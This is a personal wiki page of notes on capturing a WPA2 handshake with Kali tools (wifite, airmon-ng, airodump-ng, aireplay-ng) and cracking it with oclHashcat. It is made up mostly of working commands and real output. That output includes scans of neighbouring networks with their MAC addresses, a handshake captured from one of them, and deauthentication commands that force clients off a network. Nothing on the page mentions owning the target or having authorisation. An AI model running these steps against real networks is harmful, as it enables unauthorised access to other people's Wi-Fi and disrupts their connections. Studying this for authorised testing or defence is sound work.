Ben's notes

Linux, Unix, network, radio...

User Tools

Site Tools


capture_wpa_handshake

Capture WPA2 handshake

Hardware

  • Intel NUC
  • Intel Centrino 6235

Install Kali

  • Install Kali from USB.
  • Create user account.
  • Update.
    apt-get update
    apt-get upgrade
  • Install and enable SSHd.
    apt-get install ssh
    /etc/init.d/ssh start
    update-rc.d ssh enable

Capture with wifite

  • Start scanning.
    # wifite wpa2
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
    
       NUM ESSID                 CH  ENCR  POWER  WPS?  CLIENT
       --- --------------------  --  ----  -----  ----  ------
        1  -------                1  WPA2  34db    no   client
        2  -------               13  WPA2  34db    no   clients
        3  UPC245788570          11  WPA2  30db   wps
        4  UPC486785_EXT         11  WPA2  26db   wps
        5  UPC WifiSpots         11  WPA2  25db    no
        6  UPC486785             11  WPA2  22db    no   clients
        7  -------               11  WPA2  21db    no
        8  UPC1461170             1  WPA2  19db    no   clients
        9  VGV7519558FA2          6  WPA2  18db   wps
       10  UPC WifiSpots          1  WPA2  18db    no
       11  -------               11  WPA2  18db    no   client
       12  UPC501677338          36  WPA2  17db    no
       13  UPC245248760           6  WPA2  16db   wps   client
       14  -------              100  WPA2  15db    no
       15  H368N67798A            6  WPA2  13db   wps
       16  Ka1717169              9  WPA2  13db    no   client
       17  UPC249259973          11  WPA2  13db   wps   client
       18  UPC244634263          11  WPA2  13db   wps
       19  UPC240228706           1  WPA2  13db   wps   client
       20  UPC WifiSpots          9  WPA2  12db    no
       21  UPC1263286             6  WPA2  11db    no
       22  UPC2176918             6  WPA2  11db    no
       23  UPC WifiSpots          6  WPA2  11db    no
       24  -------                6  WPA2  10db   wps
       25  -------                1  WPA2  10db   wps
       26  Sitecom8CF98C          8  WPA2  10db   wps
       27  -------                1  WPA2   9db    no
       28  -------                6  WPA2   9db    no
       29  UPC247811359           1  WPA2   9db   wps   clients
       30  UPC241613374          11  WPA2   9db   wps
       31  UPC0988912            13  WPA2   7db    no   client
    
     [0:01:54] scanning wireless networks. 31 targets and 15 clients found
    
     [+] scanning (mon0), updates at 5 sec intervals, CTRL+C when ready.
  • Press ctrl-c when ready
  • Enter target number.
     [+] select target numbers (1-19) separated by commas, or 'all': 2
    
     [+] 1 target selected.
    
     [0:08:20] starting wpa handshake capture on "--------"
     [0:08:09] new client found: 04:F7:E4:51:E7:A8
     [0:08:08] listening for handshake...
     [0:00:12] handshake captured! saved as "hs/--------.cap"
    
     [+] 1 attack completed:
    
     [+] 1/1 WPA attacks succeeded
            Schenkel (D4:CA:6D:53:23:41) handshake captured
            saved as hs/--------.cap
    
     [+] starting WPA cracker on 1 handshake
     [!] no WPA dictionary found! use -dict <file> command-line argument
    
     [+] quitting
  • Clean the capture file.
    # wpaclean cleanwpa.cap --------.cap
    Pwning --------.cap (1/1 100%)
    Net d4:ca:6d:53:23:41 --------
    Done
  • Convert .cap file to .hccap format for olcHashcat.
    # aircrack-ng cleanwpa.cap -J out
    Opening cleanwpa.cap
    Read 3 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  D4:CA:6D:53:23:41  --------                  WPA (1 handshake)
    
    Choosing first network as target.
    
    Opening cleanwpa.cap
    Reading packets, please wait...
    
    Building Hashcat (1.00) file...
    
    [*] ESSID (length: 8): --------
    [*] Key version: 2
    [*] BSSID: D4:CA:6D:53:23:41
    [*] STA: 04:F7:E4:51:E7:A8
    [*] anonce:
        3B 00 01 41 3D 46 19 79 80 E6 90 E6 AB 3C DB 07
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
    [*] snonce:
        C6 0A 60 A0 05 03 AF CE FC E4 E7 24 72 4A 24 AC
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
    [*] Key MIC:
        AD 60 F8 4B 42 B1 CF E7 9F 82 97 0D 11 B7 CC F1
    [*] eapol:
        01 03 00 75 02 01 0A 00 10 00 00 00 00 00 00 00
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
        4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 
        04 01 00 00 0F AC 02 0C 00
    
    Successfully written to out.hccap
    
    
    Quitting aircrack-ng...
  • Try cracking with olcHashcat.
    oclHashcat64.exe -m 2500 out-wpa2.hccap -a 3 -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1?1?1
    Session.Name...: oclHashcat
    Status.........: Aborted
    Input.Mode.....: Mask (?1?1?1?1?1?1?1?1?1?1?1?1) [12]
    Hash.Target....: -------- (04:f7:e4:51:e7:a8 <-> d4:ca:6d:53:23:41)
    Hash.Type......: WPA/WPA2
    Time.Started...: Thu Jun 12 22:01:32 2014 (2 mins, 5 secs)
    Time.Estimated.: > 10 Years
    Speed.GPU.#1...:   126.6 kH/s
    Speed.GPU.#2...:   129.0 kH/s
    Speed.GPU.#3...:   129.2 kH/s
    Speed.GPU.#4...:   124.4 kH/s
    Speed.GPU.#5...:   129.1 kH/s
    Speed.GPU.#6...:   129.0 kH/s
    Speed.GPU.#*...:   767.2 kH/s
    Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
    Progress.......: 94814208/16533293572437839872 (0.00%)
    Skipped........: 0/94814208 (0.00%)
    Rejected.......: 0/94814208 (0.00%)
    HWMon.GPU.#1...: 83% Util, 61c Temp, 61% Fan
    HWMon.GPU.#2...: 86% Util, 62c Temp, 60% Fan
    HWMon.GPU.#3...: 84% Util, 65c Temp, 48% Fan
    HWMon.GPU.#4...: 85% Util, 63c Temp, 44% Fan
    HWMon.GPU.#5...: 84% Util, 58c Temp, 40% Fan
    HWMon.GPU.#6...: 87% Util, 63c Temp, 48% Fan
    
    Started: Thu Jun 12 22:01:32 2014
    Stopped: Thu Jun 12 22:03:40 2014
  • Or try with wordlist and rules.
    oclHashcat64.exe -a 0 -r rules\best64.rule -m 2500 -o foundpass.txt out-wpa2.hccap totaal_cleanfile.txt

Capture with airmon-ng airodump-ng

  • Enable monitor mode on WiFi.
    # airmon-ng start wlan0
    
    
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e
    PID	Name
    2506	NetworkManager
    2633	wpa_supplicant
    
    
    Interface	Chipset		Driver
    
    wlan0		Intel 6235	iwlwifi - [phy0]
    				(monitor mode enabled on mon0)
  • Find nearest wireless networks. If targetting specific AP, fix channel with '-c <chan_num>'
    # airodump-ng mon0
     CH  8 ][ Elapsed: 1 min ][ 2014-06-12 21:06
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     D4:CA:6D:53:23:41  -61      158       25    0  13  54e. WPA2 CCMP   PSK  --------
     D4:CA:6D:52:5D:E9  -61      141       13    0   1  54e. WPA2 CCMP   PSK  --------
     DC:71:44:DE:35:F8  -66      234        0    0  11  54e  WPA2 CCMP   PSK  UPC245788570
     04:A1:51:22:3A:34  -76      158        8    0  11  54e  WPA2 CCMP   PSK  UPC486785_EXT
     EA:40:F2:B1:A3:E7  -76      131        0    0  11  54e  WPA2 CCMP   MGT  UPC WifiSpots
     E8:40:F2:B1:A3:E5  -78      134        9    0  11  54e  WPA2 CCMP   PSK  UPC486785
     CE:BC:C8:FE:EA:C3  -80       85        0    0  11  54e. WPA2 CCMP   PSK  --------
     C8:BC:C8:FE:EA:C3  -80       93        2    0  11  54e. WPA2 CCMP   PSK  --------
     44:32:C8:FC:EB:9B  -84       40        0    0   1  54e  WPA2 CCMP   PSK  UPC1461170
     88:03:55:55:8F:A2  -83       61        0    0   6  54e  WPA2 CCMP   PSK  VGV7519558FA2
     5C:A3:9D:80:A3:98  -83       44        0    0   6  54e  WPA2 CCMP   PSK  UPC245248760
     46:32:C8:FC:EB:9D  -85       40        0    0   1  54e  WPA2 CCMP   MGT  UPC WifiSpots
     8C:E0:81:67:79:8A  -86       20        0    0   6  54e  WPA2 CCMP   PSK  H368N67798A
     14:49:E0:A4:70:28  -86       13        3    0  11  54e  WPA2 CCMP   PSK  UPC249259973
     5C:A3:9D:98:21:F8  -86       17        0    0  11  54e  WPA2 CCMP   PSK  UPC244634263
     5C:A3:9D:FD:13:E8  -85       36        0    0   1  54e  WPA2 CCMP   PSK  UPC240228706
     00:0C:F6:91:6A:78  -88       22        1    0  11  54e. WPA2 CCMP   PSK  Sitecom916A78
     C4:27:95:75:D8:95   -1        0        0    0   7  -1                    <length:  0>
     DC:71:44:A8:08:88  -90        2        0    0   1  54e  WPA2 CCMP   PSK  UPC242046314
     CE:BC:C8:FE:EA:C4  -86        1        0    0 100  54e  WPA2 CCMP   PSK  --------
     DC:71:44:DE:35:F0  -84        1        0    0  36  54e  WPA2 CCMP   PSK  UPC501677338
    
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe
    
     (not associated)   14:99:E2:43:58:65  -82    0 - 1      0       11  UPC1461170
     (not associated)   F0:25:B7:EB:D2:83  -90    0 - 1      0        1  H368N67798A
     D4:CA:6D:53:23:41  74:E1:B6:95:01:69  -71    0e- 0      0        9
     D4:CA:6D:53:23:41  04:F7:E4:51:E7:A8  -84    0 -24     10        8  --------
     E8:40:F2:B1:A3:E5  04:A1:51:22:3A:34   -1    0e- 0      0        1
     C8:BC:C8:FE:EA:C3  F0:27:65:D7:0D:09  -86    0 - 1      0        1
     44:32:C8:FC:EB:9B  A4:D1:D2:6A:1B:1D   -1    1e- 0      0        1
     14:49:E0:A4:70:28  C0:CB:38:01:1D:31   -1    1e- 0      0        1
     C4:27:95:75:D8:95  00:22:FA:96:D5:0C  -82    0 - 6e     0        4
  • Dump packets from target channel.
    # airodump-ng --channel 11 --bssid 00:11:22:33:44:55 --write channel11 mon0
  • Wait for handshake… or
  • Deauthenticate client from network.
    # aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0
  • Or if you don't know the MAC of any associated client, broadcast a deauth.
    # aireplay-ng --deauth 0 -a <AP_MAC> mon0
  • Extract handshakes.
    tshark -r <input file name> -R eapol || wlan.fc.type_subtype == 0×88 -w <output file name>
capture_wpa_handshake.txt · Last modified: 2021/10/09 15:14 by 127.0.0.1